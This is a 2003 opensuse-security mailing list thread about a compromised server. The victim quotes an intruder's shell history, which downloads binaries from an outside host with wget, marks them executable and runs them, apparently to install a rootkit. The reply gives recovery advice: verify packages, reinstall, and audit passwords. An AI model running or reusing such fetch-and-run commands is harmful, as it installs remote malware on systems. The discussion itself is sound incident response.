Mailinglist Archive: opensuse-security (220 mails)

< Previous Next >
Re: [suse-security] Intrusion
  • From: Kevin Brannen <kevin_brannen@xxxxxxxxxxxx>
  • Date: Mon, 24 Nov 2003 11:19:55 -0600
  • Message-id: <3FC23DBB.1080702@xxxxxxxxxxxx>
I think nuclear weapons would be a good way to handle cracking sites, crackers, and spammers. (just kidding :-)

Seriously, try running "rpm --verify" on your system to verify that your system files are intact, or find out which aren't. But in the end, if your system has been compromised, a fresh reinstall is the only way to know that there are no hidden problems on the machine. Stick a temporary machine in it's place to handle server duties, but I'd consider that machine toast.

As an aside, if a machine is handling company server duties, I won't put any user accounts on it except for admins (I don't know that the user you mentioned wasn't an admin, but just in case). Also, I'd run "crack" or "john" or some password cracking program to test the passwords used, to make sure they weren't too easy.

You have my sympathies. Having a machine cracked just makes me feel sick. :-(

HTH,
Kevin


Antun Balaz wrote:

Thanks again for helpful information.

New question: According to the history file of user whose account was used
for intrusion, rootkit was downloaded from www.cappy.biz:

cat /etc/issue
wget www.cappy.biz/0/*/k
chmod +x k
./k
wget www.cappy.biz/0/*/noparty
chmod +x noparty
./noparty
etc. etc.

Directory http://www.cappy.biz/0/*/ is very interesting. Can we
somehow act against the owner of this site, so that the same thing doesn;t
happen to other SuSE users?

Best regards,

Antun Balaz
Institute of Physics, Belgrade
Serbia and Montenegro




< Previous Next >
References